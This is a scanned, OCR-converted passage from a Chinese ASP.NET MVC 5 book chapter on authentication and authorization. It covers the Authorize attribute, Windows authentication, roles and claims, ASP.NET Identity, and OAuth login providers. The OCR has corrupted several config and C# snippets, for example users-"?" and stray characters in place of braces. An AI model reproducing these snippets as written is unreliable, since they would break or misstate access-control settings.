- Remember me? 
Login 
gister f you don't have a local account. 


Use another service to log in. 


There are no external authentication services configured. See ins arte for detalis on setting up tnis ASP.NET 
application to support logging in via external services. 


Register. 
Create a new account. 


Confirm password. 


Register 


2014 - My ASP NET Application 


图 7-3 
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注意 ， 在 创建 新 账户 时 ， 这 种 标准 的 AccountController 注 册 没 有 跟踪 来 源 页 面 ， 所 以 创 
建 完 新 账户 后 , 需要 返回 到 /Store 页 面 重 新 操作 。 我 们 可 以 自行 添加 这 种 功能 , 不 过 这 么 做 时 ， 
需要 确保 不 要 引入 一 个 开放 的 重 定 向 漏洞 (本 章 稍 后 将 进行 讨论 )。 

完成 注册 后 ， 当 再 次 单 击 Buy 按 钮 时 ， 就 会 通过 验证 检查 ， 进 入 购买 信息 确认 页 面 ， 如 
图 7-4 所 示 ( 当 然 ， 真 正 投 入 使 用 的 应 用 程序 在 结算 期 间 还 要 收集 一 些 其 他 信息 ， 正 如 MVC 
Music Store 应 用 程序 展示 的 那样 )。 


You just bought The Fall of Math for 8.99 


2014 - My ASP.NET Application. 


图 7-4 


使 用 URL 授 权 

使 用 Web Forms 保 护 应 用 程序 安全 的 一 个 普遍 方法 就 是 使 用 URL 授 权 。 例 如 ， 如 果 系 统 
拥有 管理 模块 并 且 限 制 只 有 Admins 角 色 才 能 访问 该 模块 ， 这 里 假设 把 所 有 管理 页 面 放 在 了 
Admin 文 件 夹 下 ， 那 么 除了 那些 Admins 角 色 外 ， 所 有 其 他 用 户 就 应 一 概 禁止 访问 Admin 子 文 
件 夹 。 如 果 使 用 ASPNET Web Forms 进 行 开发 ， 就 可 以 在 网 站 的 web.config 文 件 中 锁定 一 个 目 
录 ， 以 保护 该 目录 不 被 非法 访问 : 

<location path= "Admin" allowOverride="false"> 

<system.web> 

<authorization> 
<allow roles= "Administrator" /> 
<deny users-"?" /> 
</authorization> 

</system.web> 

«/location» 

然而 ， 在 MVC 框 架 中 ， 这 种 方法 却 无 法 正常 工作 ， 原 因 有 以 下 两 点 : 

。 请 求 不 再 映射 到 物理 目录 。 

e 可 能 存在 多 种 查找 同一 控制 器 的 方式 。 

从 理论 上 讲 ，MVC 方 式 可 以 拥有 一 个 封装 了 应 用 程序 管理 功能 的 AdminController， 然 后 
在 根 目录 的 web.config 文 件 中 设置 URIL 授 权 来 阻止 以 Admin 开头 的 任何 访问 请 求 。 然 而 ， 这 
未 必 是 安全 的 ， 因 为 很 有 可 能 存在 另 一 个 路 由 能 够 映射 到 AdminController。 

例如 ， 假 设 后 来 决定 要 在 默认 的 路 由 中 切换 (controller) fil (action) 的 顺序 。 切 换 后 ， 
/Index/Admin 就 是 指向 默认 页 面 的 URL， 而 前 面 设置 的 URL 授 权 将 不 能 阻止 对 这 个 URL 的 访 
问 。 

实现 安全 性 的 一 个 好 方法 是 ， 始 终 使 安全 性 检查 尽 可 能 地 接近 要 保护 的 对 象 。 可 能 有 其 
他 更 高 层 的 检查 ， 但 最 终 都 要 确保 实际 资源 的 安全 。 这 样 无 论 用 户 如 何 获得 资源 ， 该 方式 都 
会 对 其 进行 安全 性 检查 。 这 样 就 不 必 依 赖 路 由 和 URL 授 权 来 确保 控制 器 安全 了 ; 而 真正 只 需要 
保护 控制 器 本 身 的 安全 。Authorize 特 性 就 起 这 个 作用 。 
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。 ”如 果 不 指定 调用 操作 方法 的 角色 和 用 户 ， 就 必须 简单 地 验证 当前 用 户 ， 使 其 能 够 
调用 这 一 操作 方法 。 虽 然 很 简单 ， 但 这 样 可 以 阻止 来 自 特 定 控制 器 操作 的 未 授权 
用 户 。 

”如果 用 户 尝 试 访问 应 用 了 这 个 特性 的 操作 方法 ， 那 么 在 授权 检查 失败 的 情况 下 ， 
过 滤器 就 会 引发 服务 器 返回 一 个 “401 未 授权 ”HTTP 状 态 码 。 


7.2.2 ”Authorize 特 性 在 表单 身份 验证 和 AccountController 控 制 器 中 的 用 法 


上 面 例子 在 后 台 是 如 何 操作 的 呢 ? 显而易见 ， 我 们 并 没有 手动 编写 代码 (控制 器 或 视图 ) 
来 处 理 登 录 和 注册 的 URL,， 那 它们 是 从 哪里 生成 的 呢 ? 原来 设置 了 Individual User Accounts 
份 验证 的 ASPNET MVC 模 板 包含 一 个 AccountController， 它 支持 OpenID 和 OAuth 验 证 的 本 地 
和 外 部 账户 管理 。 

Authorize 特 性 是 一 个 过 滤器 ， 也 就 是 说 ， 它 能 先 于 相关 控制 器 操作 执行 。 即 Authorize 特 
性 首先 执行 它 在 OnAuthorization 方 法 中 的 主要 操作 ， 这 是 一 个 在 接口 IAuthorizationFilter 中 定 
义 的 标准 方法 。 查 看 MVC 源 代码 ,就 可 以 看 到 基本 的 安全 检查 机 制 正在 核实 ASPNET 上 下 文 
中 存储 的 基本 身份 验证 信息 : 

IPrincipal user = httpContext.User; 


if (!user.Identity.IsAuthenticated) 
{ 


return false; 
} 


if ( usersSplit.Length > 0 && 
! usersSplit.Contains (user.Identity.Name, 
StringComparer.OrdinallgnoreCase) 
t 
return false; 


} 


if ( rolesSplit.Length > 0 && ! rolesSplit.Any (user.IsInRole) 
$ 
return false; 


} 
return true; 


如 果 用 户 身 份 验证 失败 ， 就 会 返回 一 个 HttpUnauthorizedResult 操 作 结果 ， 它 产生 一 个 
HTTP 401( 未 授权 ) 的 状态 码 。 

对 于 未 授权 请 求 ,401 状 态 码 是 十 分 精准 、 但 是 不 太 友好 的 响应 。 大 多 数 网 站 不 会 返回 一 
个 原始 的 HTTP 401 响 应 给 浏览 器 处 理 。 相 反 , 它们 通常 使 用 一 个 HTTP 302 响 应 将 用 户 重 定向 
到 登录 页 面 , 以 便 对 有 权 查 看 原来 页 面 的 用 户 进行 身份 验证 ,使 用 基于 cookie 的 身份 验证 时 (这 
是 使 用 诸如 用 户 名 /密码 或 OAuth 登 录 的 个 人 用 户 账户 的 ASPNET MVC 应 用 程序 的 默认 设 
置 )，ASPNET MVC 会 自动 处 理 从 401 到 302 重 定向 的 响应 转换 。 
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401 到 302 重 定向 转换 过 程 的 背后 原理 


TEASPNET MVC 5 中 , 401 到 302 重 定向 的 转换 过 程 是 由 OWIN(Open Web Interface for NET) 
中 间 件 组 件 处 理 的 。 基 于 cookie 的 身份 验证 由 CookieAuthenticationHandler( 包 含 在 Microsoft. 
Owin.Cookies 名 称 空间 中 ) 处 理 。 这 个 处 理 程序 派生 自 Microsoft.Owin.Security.Infrastructure. 
AuthenticationHandler 基 类 , 并 重 写 了 一 些 关 键 的 方法 )。ApplyResponseChallengeAsync 方 法 处 
理 重 定向 ， 把 未 经 过 身份 验证 的 请 求 重 定向 到 LoginPath 值 ， 默 认 值 为 " /Account/Login"。 最 
初 发 布 时 ， 还 需要 开发 人 员 做 一 些 修改 工作 ,但 是 Microsoft.Owin.Security NuGet 包 的 2.1 版 本 
更 新 包含 了 一 个 OnApplyRedirect 回 调 , 让 设置 登录 路 径 ( 甚 至 是 在 运行 时 设置 ) 变 得 容易 许多 。 

关于 这 个 中 间 件 具体 如 何 实现 的 更 多 信息 ， 可 以 阅读 Brock Allen 撰 写 的 一 篇 介绍 OWIN 
身份 验证 中 间 件 架构 的 极 好 的 文章 ， 网 址 为 : http://brockallen.com/2013/08/07/owin- 
authentication-middleware-architecture/。 

在 ASPNET MVC 以 前 的 版 本 中 , 这 个 重 定向 被 FormsAuthenticationModule 的 OnLeave 方 
法 截获 ， 并 转 而 重 定向 到 在 应 用 程序 web.config 文 件 中 定义 的 登录 页 面 ， 代 码 如 下 : 

<authentication mode="Forms"> 


«forms loginUrl-"-/Account/LogOn" timeout-"2880" /> 
«/authentication» 


这 个 重 定向 地 址 包含 一 个 返回 URL， 以 便 成 功 登 录 系 统 后 ，Account LogOn 操 作 可 以 重 
定向 到 最 初 的 请 求 页 面 。 


作为 安全 向 量 打开 重 定向 


登录 重 定向 过 程 是 开放 重 定向 攻击 的 一 个 目标 ， 因 为 攻击 者 可 以 制作 一 些 恶 意 的 登录 
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URL， 这 些 URL 可 以 把 用 户 重 定向 到 有 和 害 网 站 。 本 章 后 面部 分 就 会 介绍 这 种 威胁 。ASPNET 
MVC 5 应 用 程序 中 的 标准 AccountController 会 进行 检查 ， 确 保 登 录 URL 隶 属于 应 用 程序 ， 但 
是 从 作为 应 用 程序 开发 人 员 这 个 角度 来 看 ， 并 且 考 虑 到 需要 修改 账户 控制 器 或 者 编写 自 定义 
账户 控制 器 的 情况 ， 知 道 这 种 潜在 的 威胁 十 分 重要 。 


使 用 单独 用 户 账户 身份 验证 的 ASPNET MVC 模 板 提 供 了 AccountController 控 制 器 及 其 关 
联 的 所 有 视图 ， 这 一 点 很 好 ， 因 为 这 样 就 可 以 在 简单 的 应 用 场合 中 轻松 地 添加 授权 ， 而 不 需 
要 编写 任何 额外 的 代码 ， 也 不 需要 添加 任何 额外 的 配置 。 
锦上添花 的 是 ， 还 可 以 修改 下 面 这 些 部 分 : 
e AccountController( 及 其 关联 的 Account 模 型 和 视图 ) 是 一 个 标准 的 ASPNET MVC 控 制 
器 ， 它 很 容易 修改 。 
e 授权 调用 不 利于 ASPNET Identity 系统 中 发 布 的 标准 OWIN 中 间 件 组 件 . 这 里 可 以 切 
换 身 份 验证 中 间 件 组 件 ， 或 者 自行 编写 身份 验证 中 间 件 组 件 。 
e Authorize Attribute 是 一 个 实现 了 IAuthorizeFilter 接口 的 标准 授权 特性 。 当然 也 可 以 创 
建 自己 的 授权 过 滤器 。 
7.2.3 Windows Authentication 


选择 Windows Authentication 选 项 时 ， 身 份 验证 实际 上 是 由 Web 浏 览 器 、Windows 和 ITS 在 
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应 | 


程序 外 部 处 理 的 。 也 因此 ， 项 目 中 既 没 有 包含 Startup.Auth.cs， 也 没有 配置 身份 验证 中 
间 件 。 


因为 使 用 Windows Authentication 可 在 Web 应 用 程序 之 外 处 理 Registration 和 Log On 操作 ， 该 模 


板 不 要 求 提 供 AccountController 及 其 相关 模型 和 视图 。 为 配置 Windows Authentication, "t fE 
web.config 文 件 中 包含 了 下 面 一 行 代码 : 


Authentication 这 个 选项 ， 就 要 在 服务 器 上 安装 Windows Authentication。 在 Windows 中 ， 启 上 


«authentication mode-"Windows" /> 


为 使 用 Intranet 验 证 选项 ， 我 们 需要 启用 Windows 验 证 ， 禁 用 Anonymous 验 证 。 


1. IIS7 和 IIS8 


运行 在 IS 7 和 IIS 8 下 时 ， 需 要 完成 下 面 的 步骤 来 配置 Intranet 身 份 验证 

(1) 打开 IS 管 理 器 并 导航 到 创建 的 站 点 。 

(2) 在 Features 视 图 中 ， 双 击 Authentication 选 项 。 

(3) 在 Authentication 页面 中 选择 Windows Authentication X Jj . tn R z fj Windows 


Windows Authentication 的 步骤 如 下 : 


1) 在 Control Panel 中 打开 Programs and Features 页 面 。 
2) 将 页 面 中 的 Tum Windows Features 设 置 为 On 或 Off。 
3) 导航 到 Internet Information Services | World Wide Web Services | Security 下 并 确保 选择 


Į Windows Authentication 15 P3 o 


为 在 Windows Server 中 启用 Windows 验 证 ， 执 行 如 下 步骤 ， 

1) 在 Server Manager 中 ， 选 择 Web Server(IIS)， 并 单 击 Add Role Services. 
2) 导航 到 Web Server | Security， 并 选择 Windows 验 证 节点 。 

(4) 在 Actions 窗 格 中 ， 单 击 Enable 来 启用 Windows Authentication. 

(5) 在 Authentication 页 面 中 ， 选 择 Anonymous Authentication 选 项 。 

(6) 在 Actions 窗 格 中 ， 单 击 Disable 来 禁止 匿名 身份 验证 。 


2. IIS Express 
运行 在 IIS Express 下 时 ， 需 要 完成 下 面 的 步骤 来 配置 Intranet 身 份 验证 
(1) 在 Solution Explorer 中 选择 项 目 。 
(2) 如 果 Properties 窗 口 没 有 打开 ， 就 按 F4 键 将 其 打开 。 
(3) 在 Properties 窗 格 中 设置 如 下 选项 : 
e 将 Anonymous Authentication 设置 为 Disabled。 
e 将 Windows Authentication 设置 为 Enabled。 


3. 整个 控制 器 的 安全 性 
前 面 的 例子 已 经 展示 了 如 何 将 Authorize 特 性 应 用 于 单个 控制 器 的 特定 控制 器 操作 。 一 段 


时 间 后 ， 我 们 可 能 会 意识 到 站 点 浏览 、 购 物 车 及 结算 部 分 分 别 需要 一 个 单独 的 控制 器 。 一 些 
操作 是 与 匿名 购物 车 (查看 购物 车 、 向 购物 车 添加 商品 、 从 购物 车 中 删除 商品 ) 和 身份 验证 结 
算 (添加 地 址 和 支付 信息 、 完 成 结算 ) 相 关联 的 。 对 结算 过 程 要 求 授权 可 以 在 MVC Music Store 
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应 用 场合 中 透明 地 实现 从 (匿名 的 ) 购 物 车 到 (要 求 注册 的 ) 结 算 的 过 渡 。 可 以 通过 在 控制 器 
CheckoutController 上 添加 Authorize 特 性 来 满足 结算 对 授权 的 要 求 ， 代 码 如 下 : 


[Authorize] 
public class CheckoutController : Controller 


这 样 就 使 得 控制 器 CheckoutController 中 的 所 有 操作 都 允许 注册 用 户 访问 ， 但 禁止 匿名 
访问 。 


4. 使 用 全 局 授权 过 滤器 保障 整个 应 用 程序 安全 


对 于 大 部 分 网 站 来 说 ， 基 本 上 整个 应 用 程序 都 是 需要 授权 的 。 这 种 情形 下 ， 默 认 授权 要 
求 和 匿名 访问 少数 网 页 (比如 主页 和 一 些 登 录 有 关 的 页 面 ) 就 变 得 极其 简单 。 因 此 ， 把 
AuthorizeAttribute 配 置 为 全 局 过 滤器 , 使 用 AllowAnonymous 特 性 匿名 访问 指定 控制 器 或 方法 ， 
就 变 成 了 不 错 的 想法 。 

为 将 AuthorizeAttribute 注 册 为 全 局 过 滤器 ， 需 要 把 它 添加 到 RegisterGlobalFilters( 包 含 在 
\App_Start\FilterConfig.cs 文 件 中 ) 中 的 全 局 过 滤器 集合 : 

public static void RegisterGlobalFilters (GlobalFilterCollection filters) { 


filters.Add(new System.Web.Mvc.AuthorizeAttribute()); 
filters.Add(new HandleErrorAttribute()); 


) 


这 样 就 会 把 AuthorizeAttribute 应 用 到 整个 程序 的 所 有 控制 器 操作 。 
显而易见 ， 全 局 身份 验证 的 问题 也 限制 了 对 整个 网 站 的 访问 ， 其 中 包括 对 
AccountController 的 访问 。 其 结果 就 是 ,用 户 在 能 够 进行 注册 之 前 ， 必 须 已 经 登录 ,但 是 此 时 
他 们 并 没有 账户 ! 在 MVC 4 之 前 ， 我 们 如 果 想 利用 全 局 过 滤器 来 进行 授权 ， 就 不 得 不 进行 一 
些 特殊 处 理 以 便 能 够 匿名 访问 AccountController。 一 种 常用 方法 是 使 用 AuthorizeAttribute 的 子 
类 ， 在 其 子 类 中 实现 一 些 额 外 逻辑 来 支持 对 特定 操作 的 访问 。MVC 4 中 新 添加 了 
AllowAnonymous 特 性 。 我 们 可 以 把 AllowAnonymous 放 在 任何 方法 (或 整个 控制 器 ) 来 选择 所 需 
的 授权 。 
举 一 个 例子 ， 在 使 用 Individual User Accounts 验 证 创建 的 MVC 5 应 用 程序 中 ,我 们 可 以 看 
到 默认 的 AccountController。 如 果 把 AuthorizeAttribute 注 册 为 全 局 过 滤器 ， 并 且 有 些 方法 都 需 
要 外 部 访问 ， 那 么 这 些 方法 只 需要 用 AllowAnonymous 特 性 装饰 即 可 。 例 如 ，Login HTTP Get 
操作 的 代码 如 下 所 示 : 
ti 
// GET: /Account/Login 
[AllowAnonymous] 
public ActionResult Login(string returnUrl) 
i ViewBag.ReturnUrl = returnUrl; 


return View(); 
) 


这 样 一 来 ， 即 便 把 AuthorizeAttribute 注 册 为 全 局 过 滤器 ， 用 户 仍 能 访问 登录 操作 。 
尽管 AllowAnonymous 解 决 了 这 个 问题 ， 但 是 它 只 对 标准 的 AuthorizeAttribute 有 效 ， 对 于 
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自 定义 授权 过 滤器 ， 则 不 一 定 起 作用 。 如 果 使 用 了 自 定义 授权 过 滤器 ， 那 么 需要 使 用 MVC 5 
中 新 增 的 一 个 特性 : 重 写 过 滤器 。 这 种 特性 允许 在 局 部 重 写 任何 过 滤器 (例如 ， 任 何 派生 自 
IAuthorizationFilters 的 自 定义 授权 过 滤器 )。 第 15 章 的 “过 滤器 重 写 ”一 节 将 详细 讨论 此 主题 。 


全 局 授权 仅 对 MVC 是 全 局 的 


全 局 过 滤器 只 针对 MVC 控 制 器 操作 ， 记 住 这 一 点 很 重要 。 它 不 能 保障 Web Forms, Bf 
内 容 或 其 他 ASPNET 处 理 程序 的 安全 。 

正如 前 面 提 到 的 ，Web Forms 和 静态 资源 映射 到 文件 路 径 ， 可 使 用 web.config 文 件 中 的 
authorization 元 素来 确保 它们 的 安全 。ASPNET 处 理 程序 的 安全 性 问题 比较 复杂 ; 与 MVC 操 作 
类 似 ， 一 个 处 理 程序 可 以 映射 到 多 个 URL。 

安全 处 理 程序 通常 通过 ProcessRequest 方 法 中 的 自 定义 代码 来 处 理 。 例 如 ， 可 以 检查 
UserIdentityIsAuthenticated， 并 重 定向 ， 或 者 身份 验证 检查 失败 ， 返 回 一 个 错误 。 


7.3 要求 角色 成 员 使 用 Authorize 特 性 


到 目前 为 止 ， 已 经 介绍 了 如 何 使 用 Authorize 特 性 来 阻止 用 户 匿 名 访问 控制 器 或 控制 器 操 
作 。 然 而 ， 正 如 刚才 提 到 的 ， 我 们 也 能 限制 特定 用 户 或 角色 的 访问 。 常 见 的 例子 是 将 其 应 用 
于 管理 功能 。 随 着 开发 工作 的 进展 ， 通 过 直接 编辑 数据 库 来 编辑 专辑 目录 的 方法 已 无 法 满足 
MVC Music Store 应 用 程序 的 需求 。 因 此 就 出 现 了 StoreManagerController。 

然而 ，StoreManagerController 不 允许 随机 注册 用 户 的 访问 ， 因 为 他 们 只 是 为 了 编辑 、 添 
加 或 删除 专辑 才 注 册 账 户 。 现 在 需要 限制 特定 角色 或 用 户 的 访问 。 可 喜 的 是 ，Authorize 特 性 
允许 指定 角色 和 用 户 ， 代 码 如 下 所 示 : 

[Authorize (Roles="Administrator")] 

public class StoreManagerController : Controller 

这 样 一 来 , 就 使 得 只 有 属于 Administrator 角 色 的 用 户 才能 访问 StoreManagerController 控 制 
嚣 。 匿 名 用 户 或 已 注册 但 不 属于 Administrator 角 色 的 用 户 将 不 能 访问 控制 器 Store- 
ManagerController 中 的 操作 。 

顾名思义 ，Roles 参 数 可 以 有 多 个 角色 ， 我 们 可 以 给 它 传递 一 个 角色 列表 ， 角 色 之 间 用 去 
号 分 隔 : 

[Authorize (Roles-"Administrator,SuperAdmin")] 

public class TopSecretController:Controller 


也 可 以 授权 给 一 组 用 户 : 


[Authorize (Users-"Jon, Phil,Scott,Brad,David")] 
public class TopSecretController:Controller 


当然 ， 也 可 以 同时 授权 给 用 户 和 角色 : 


[Authorize (Roles-"UsersNamedScott", Users-"Jon,Phil,Brad,David")] 
public class TopSecretController:Controller 
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管理 权限 : 用 户 、 角 色 和 声明 
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应 该 考虑 使 用 角色 而 不 是 用 户 来 管理 权限 ， 这 通常 有 以 下 几 个 原因 : 
e 可 以 添加 和 删除 用 户 , 而 且 对 于 一 个 特定 的 用 户 , 它 的 访问 权限 会 随 着 时 间 变 化 不 断 
地 变更 。 
e 通常 情况 下 , 管理 角色 成 员 要 比 管理 用 户 成 员 简单 。 如果 新 雇佣 了 一 个 办 公 室 管理 员 ， 
可 以 在 不 改变 代码 的 情况 下 轻松 将 他 添加 到 Administrator 角 色 中 。 如 果 在 系统 中 添加 
一 个 新 的 管理 用 户 ， 就 需要 改变 所 有 Authorize 特 性 ， 并 且 还 要 部 署 新 版 本 的 应 用 程序 
集 ， 这 样 就 贻 笑 大 方 了 。 
e 基于 角色 的 管理 可 以 在 不 同 的 部 署 环境 中 拥有 不 同 的 访问 列表 。 我 们 可 能 想 在 开发 环 
境 中 授权 给 开发 人 员 对 工资 应 用 程序 的 Administrator 访 问 权限 ， 但 在 生产 环境 中 不 会 
当 创建 角色 组 时 ， 可 考虑 使 用 基于 特权 的 角色 分 组 。 例 如 ， 名 为 CanAdjustCompensation 和 
CanEditAlbums 的 角色 组 要 比 权限 过 度 泛 化 的 角色 组 ( 像 Administrator 组 ， 后 面 不 可 避免 地 会 有 
SuperAdmin 组 ， 同 样 也 不 可 避免 地 会 有 SuperSuperAdmin 组 ) 要 更 精细 ， 更 便于 管理 。 
继续 沿 着 这 个 方向 走 下 去 ， 就 是 基于 声明 的 授权 。 从 .NET 4.5 开 始 ，ASPNET 就 在 后 台 
支持 基于 声明 的 授权 ， 不 过 不 是 通过 AuthorizeAttribute 提 供 的 。 下 面 介绍 理解 角色 与 声明 之 
间 的 区 别 的 一 种 简单 方法 : 角色 成 员 就 是 一 个 布尔 值 一 一 一 个 用 户 要 么 是 、 要 么 不 是 某 个 角 
色 的 成 员 。 声 明 可 以 包含 一 个 值 ， 而 不 仅仅 是 一 个 布尔 值 。 这 意味 着 用 户 的 声明 可 以 包含 他 
们 的 用 户 名 、 公 司 部 门 、 能 够 管理 的 其 他 用 户 组 或 用 户 级 别 等 。 因 此 ， 使 用 声明 时 ， 不 需要 使 
用 一 组 角色 来 管理 补偿 调整 权限 的 范围 (CanAdjustCompensationForEmployees 、 
CanAdjustCompensationForManagers 等 )。 单 独 的 一 个 声明 令 牌 可 以 包含 关于 管理 哪些 员工 的 
丰富 信息 。 
这 意味 着 角色 其 实 只 是 声明 的 特殊 情况 ， 因 为 角色 中 的 成 员 就 是 一 个 简单 的 声明 。 
要 获得 上 面 讨论 安全 级 别 之 间 交 互 的 一 个 完整 例子 ， 可 以 从 http:/mvcmusicstore. 
codeplex.com E F £X MVC Music Store 应 用 程序 ， 从 中 可 以 观察 到 StoreController、 
CheckoutController 和 StoreManagerController 之 间 的 过 渡 。 这 个 交互 需要 几 个 控制 器 和 一 个 后 备 
数据 库 ， 因 此 ， 下 载 完 整 的 程序 代码 是 最 简单 的 ， 不 必 安 装 NuGet 包 ， 也 不 必 进 行 多 步 配置 。 


7.4 扩展 用 户 身份 


表面 看 来 , MVC 5 中 与 身份 和 安全 机 制 交 互 的 方式 与 以 前 版 本 的 MVC 很 相似 。 例 如 ， 仍 
然 可 以 像 原 来 一 样 继续 使 用 前 一 节 讨论 的 Authorize 特 性 。 但 是 ， 第 1 章 已 经 提 到 ，MVC 5( 和 
ASPNET) 中 的 整个 身份 基础 设施 已 被 使 用 新 的 ASPNET Identity 系 统 重 写 。 

ASPNET Identity 系 统 的 设计 需求 之 一 是 允许 轻松 进行 广泛 的 自 定 义工 作 。 下 面 列 出 了 一 
些 扩展 点 : 

e 现在 添加 额外 的 用 户 配 置 文件 数据 十 分 容易 。 

e 通过 使 用 数据 访问 层 之 上 的 UserStore 和 RoleStore 抽象 支持 持久 化 控制 。 

© RoleManager 使 得 创建 角色 和 管理 角色 成 员 十 分 容易 。 
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ASPNET Identity 的 官方 文档 (http://asp.net/identity) 包 含 了 详尽 的 解释 和 示例 ， 而 且 
ASPNET Identity 系 统 正在 快速 成 熟 ， 所 以 本 节 将 重点 放 在 介绍 重点 内 容 上 。 


7.4.1 存储 额外 的 用 户 资料 数据 


存储 用 户 的 额外 信息 (如 生日 、Twitter handle、 网 站 首选 项 等 ) 是 一 个 十 分 常见 的 需求 。 过 
去 ， 添 加 额外 的 资料 数据 极其 困难 。 在 ASPNET Identity 中 ， 用 户 是 使 用 实体 框架 Code First 
模型 建 模 的 ， 所 以 要 添加 用 户 的 额外 信息 ， 只 需要 在 ApplicationUser 类 (包含 在 
/Models/IdentityModels.cs 中 ) 中 添加 属性 。 例 如 ， 为 了 添加 用 户 的 Address 和 Twitter handle， 只 
需要 添加 下 面 的 属性 : 

public class ApplicationUser : IdentityUser 

i public string Address { get; set; } 


public string TwitterHandle { get; set; } 
} 


在 以 下 网 址 可 找到 更 详细 的 介绍 : http://go.microsoft.com/fwlink/?LinkID=317594。 


7.4.2 ”持久 化 控制 


默认 情况 下 ，ASPNET Identity 使 用 实体 框架 Code First 实 现 数据 存储 ， 所 以 可 以 按照 正常 配 
置 实体 框架 的 任何 方式 自 定义 数据 存储 (例如 将 连接 字符 串 指向 实体 框架 支持 的 任何 数据 库 )。 

另外 ，ASPNET Identity 的 数据 存储 构建 在 UserStore 和 RoleStore 抽 象 之 上 。 可 以 用 自己 喜 
欢 的 任何 方式 实现 自 定义 的 UserStore 和 /或 RoleStore 来 持久 化 数据 ， 包 括 Azure Table Storage, 
自 定义 文件 格式 以 及 Web 服 务 调用 等 。 

以 下 网 址 的 教程 详细 解释 了 相关 概念 ， 并 链接 到 了 一 个 使 用 MySQL 的 示例 : http://www. 


asp.net/identity/overview/extensibility/overview-of-custom-storage-providers-for-aspnet-identity o 


74.3 管理 用 户 和 角色 


ASPNET Identity 包 含 一 个 UserManager 和 一 个 RoleManager， 简 化 了 常见 任务 的 执行 ， 如 
创建 用 户 和 角色 、 向 角色 添加 用 户 、 检 查 用 户 是 否 属于 某 个 角色 等 。 

以 下 网 址 给 出 了 一 个 详尽 的 示例 : http://azure.microsoft.com/en-us/documentatior/articles/ 
web-sites-dotnet-deploy-aspnet-mvc-app-membership-oauth-sql-database/。 

需要 的 时 人 息 有 这 些 扩展 点 可 用 ， 这 对 我 们 很 有 帮助 。 多 数 时 候 ， 如 果 使 用 标准 的 
AccountController 并 通过 实体 框架 存储 用 户 信息 ， 只 需要 照常 编码 ,不必 考虑 扩展 点 。 需 要 的 
时 候 ， 使 用 这 些 扩展 点 即 可 。 


7.5 通过 OAuth 和 OpenlD 的 外 部 登录 


从 以 往来 看 ， 大 多 数 Web 应 用 程序 都 是 基于 本 地 的 账户 数据 库 来 处 理 授权 问题 。 传 统 的 
ASPNET Membership 系 统 便 是 一 个 大 家 所 熟知 的 例子 ， 新 用 户 向 系统 提供 用 户 名 、 密 码 和 其 
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他 需要 的 信息 来 注册 账号 。 应 用 程序 把 这 些 用 户 信息 添加 到 本 地 的 成 员 数据 库 ， 然 后 利用 数 
据 库 中 的 用 户 信息 验证 用 户 登录 。 
虽然 传统 的 成 员 资 格 适用 于 大 多 数 Web 应 用 程序 ， 但 是 它 也 带 有 一 些 严重 的 负面 影响 : 
e 维护 包含 有 用 户 信息 和 加 密 口 令 的 本 地 数据 库 是 一 项 重大 责任 。 现在 听 到 那些 涉及 成 
千 上 万 个 用 户 账户 信息 (通常 包含 未 加 密 的 密码 ) 的 重大 安全 漏洞 ， 已 经 是 司空 见 惯 的 
事情 了 。 更 糟 的 是 ， 由 于 许多 用 户 在 多 个 网 站 都 使 用 同样 的 口令 ， 受 威胁 的 账户 可 能 
会 影响 到 他 们 在 银行 或 其 他 敏感 网 站 的 账户 安全 。 
e 网 站 注册 非常 麻烦 。 用 户 已 经 厌倦 了 填写 表格 ， 遵 循 各 种 不 同 的 密码 规则 ， 记 忆 密 码 
以 及 担心 我 们 的 网 站 是 否 能 够 确保 他 们 的 信息 安全 。 因 此 ， 相 当 一 部 分 的 潜在 用 户 都 
选择 不 在 我 们 的 网 站 注 
OAuth 和 OpenID 是 开放 的 授权 标准 。 这 些 协议 允许 用 户 使 用 他 们 已 有 的 账户 登录 我 们 的 
网 站 ,这些 账户 必须 来 自 他 们 信任 的 网 站 ( 称 为 提供 器 )， 如 Google、Twitter 和 Microsoft 等 其 他 
网 站 。 
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(2) 注意 技术 上 讲 , 设计 OAuth 协 议 是 出 于 授权 的 目的 , 但 是 该 协议 常常 被 用 来 进 
行 身 份 验证 。 


在 过 去 ， 配 置 网 站 以 支持 OAuth 和 OpenID 是 非常 难 实现 的 ， 原 因 有 如 下 两 点 ， 首 先是 协 
议 复杂 , 然后 是 顶级 提供 器 对 这 两 种 协议 的 实现 方式 不 一 样 。 MVC 通 过 在 使 用 Individual User 
Accounts 身 份 验证 的 项 目 模 板 中 内 置 支持 OAuth 和 OpenID 极 大 地 简化 了 这 一 点 。 这 种 支持 包括 

-个 更 新 的 AccountController、 便 于 注册 和 账户 管理 的 视图 以 及 通过 OWIN 中 间 件 实现 的 基础 设 

施 支 持 。 

新 的 登录 页 面 会 出 现 两 个 选项 :“Use a local account to log in” 和 “Use another service to log 
in”， 如 图 7-5 所 示 。 从 图 中 页 面 可 以 看 出 ， 现 在 我 们 的 网 站 支持 两 个 选项 。 如 果 用 户 愿 意 ， 
他 们 可 以 继续 创建 本 地 账户 。 


Log in. 


Use a local account to log in. 


olei cube scies cee eed Soe for detais on setting up this ASP.NET 
n to support logging in via extemai service 
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7.5.1 注册 外 部 登录 提供 器 


我 们 需要 显 式 地 启用 外 部 网 站 ， 以 便利 用 它们 的 账户 登录 我 们 的 网 站 。 可 喜 的 是 ， 这 个 
操作 非常 简单 。 我 们 可 以 在 App_Start\Startup.Auth.cs 中 配置 授权 提供 程序 。 当 创建 新 的 应 用 
程序 时 ，Startup.Auth.cs 中 的 所 有 验证 提供 器 都 会 注释 掉 ， 并 会 出 现 如 下 形式 : 


public partial class Startup 
t 
// For more information on configuring authentication, 
// please visit http://go.microsoft.com/fwlink/?LinkId-301864 
public void ConfigureAuth (IAppBuilder app) 
{ 
// Enable the application to use a cookie to store 
// information for the signed in user 
app.UseCookieAuthentication (new CookieAuthenticationOptions 
t 
AuthenticationType - 
DefaultAuthenticationTypes.ApplicationCookie, 
LoginPath = new PathString("/Account/Login") 
H); 


// Use a cookie to temporarily store information about 
// a user logging in with a third party login provider 


app.UseExternalSignInCookie( 
DefaultAuthenticationTypes.ExternalCookie); 


// Uncomment the following lines to enable logging in 
// with third party login providers 


//app.UseMicrosoftAccountAuthentication( 
// clientId: "", 
/4 clientSecret: ""); 


//app.UseTwitterAuthentication( 
//  consumerKey: "", 
//  consumerSecret: ""); 


//app.UseFacebookAuthentication( 
/f  appid: "", 
//  appSecret: ""); 


//app.UseGoogleAuthentication(); 


} 


使 用 OAuth 提 供 器 的 网 站 (如 Facebook、Twitter 和 Microsoft 等 ) 要 求 我 们 把 网 站 注册 为 一 个 
